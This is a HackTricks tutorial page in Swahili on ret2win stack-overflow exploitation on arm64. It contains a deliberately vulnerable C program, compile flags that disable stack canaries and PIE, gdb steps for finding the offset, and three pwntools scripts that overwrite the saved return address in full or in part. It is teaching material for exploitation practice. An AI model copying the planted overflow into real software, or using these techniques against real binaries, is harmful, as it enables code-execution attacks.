Ret2win - arm64

Reading time: 4 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Pata utangulizi wa arm64 katika:

{{#ref}} ../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md {{#endref}}

Code

c
#include <stdio.h>
#include <unistd.h>

void win() {
printf("Congratulations!\n");
}

void vulnerable_function() {
char buffer[64];
read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
}

int main() {
vulnerable_function();
return 0;
}

Kusanya bila pie na canary:

bash
clang -o ret2win ret2win.c -fno-stack-protector -Wno-format-security -no-pie

Kupata offset

Chaguo la muundo

Mfano huu ulitengenezwa kwa kutumia GEF:

Anza gdb na gef, tengeneza muundo na uvitumie:

bash
gdb -q ./ret2win
pattern create 200
run

arm64 itajaribu kurudi kwenye anwani katika register x30 (ambayo ilikua imeharibiwa), tunaweza kutumia hiyo kupata ofset ya muundo:

bash
pattern search $x30

Kipimo ni 72 (9x48).

Chaguo la kipimo cha stack

Anza kwa kupata anwani ya stack ambapo usajili wa pc umehifadhiwa:

bash
gdb -q ./ret2win
b *vulnerable_function + 0xc
run
info frame

Sasa weka breakpoint baada ya read() na uendelee hadi read() itakapotekelezwa na uweke muundo kama 13371337:

b *vulnerable_function+28
c

Pata mahali ambapo muundo huu umehifadhiwa katika kumbukumbu:

Kisha: 0xfffffffff148 - 0xfffffffff100 = 0x48 = 72

Hakuna PIE

Kawaida

Pata anwani ya kazi ya win:

bash
objdump -d ret2win | grep win
ret2win:     file format elf64-littleaarch64
00000000004006c4 <win>:

Kuvunja:

python
from pwn import *

# Configuration
binary_name = './ret2win'
p = process(binary_name)

# Prepare the payload
offset = 72
ret2win_addr = p64(0x00000000004006c4)
payload = b'A' * offset + ret2win_addr

# Send the payload
p.send(payload)

# Check response
print(p.recvline())
p.close()

Off-by-1

Kwa kweli hii itakuwa kama off-by-2 katika PC iliyohifadhiwa kwenye stack. Badala ya kufuta anwani zote za kurudi, tutafuta tu byte 2 za mwisho kwa 0x06c4.

python
from pwn import *

# Configuration
binary_name = './ret2win'
p = process(binary_name)

# Prepare the payload
offset = 72
ret2win_addr = p16(0x06c4)
payload = b'A' * offset + ret2win_addr

# Send the payload
p.send(payload)

# Check response
print(p.recvline())
p.close()

Unaweza kupata mfano mwingine wa off-by-one katika ARM64 katika https://8ksec.io/arm64-reversing-and-exploitation-part-9-exploiting-an-off-by-one-overflow-vulnerability/, ambayo ni off-by-one halisi katika udhaifu wa kufikirika.

Pamoja na PIE

tip

Jenga binary bila ya -no-pie argument

Off-by-2

Bila leak hatujui anwani halisi ya kazi ya kushinda lakini tunaweza kujua offset ya kazi kutoka kwa binary na kujua kwamba anwani ya kurudi tunayopitisha tayari inaelekeza kwenye anwani ya karibu, inawezekana kuvuja offset kwa kazi ya kushinda (0x7d4) katika kesi hii na kutumia tu offset hiyo:

python
from pwn import *

# Configuration
binary_name = './ret2win'
p = process(binary_name)

# Prepare the payload
offset = 72
ret2win_addr = p16(0x07d4)
payload = b'A' * offset + ret2win_addr

# Send the payload
p.send(payload)

# Check response
print(p.recvline())
p.close()

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks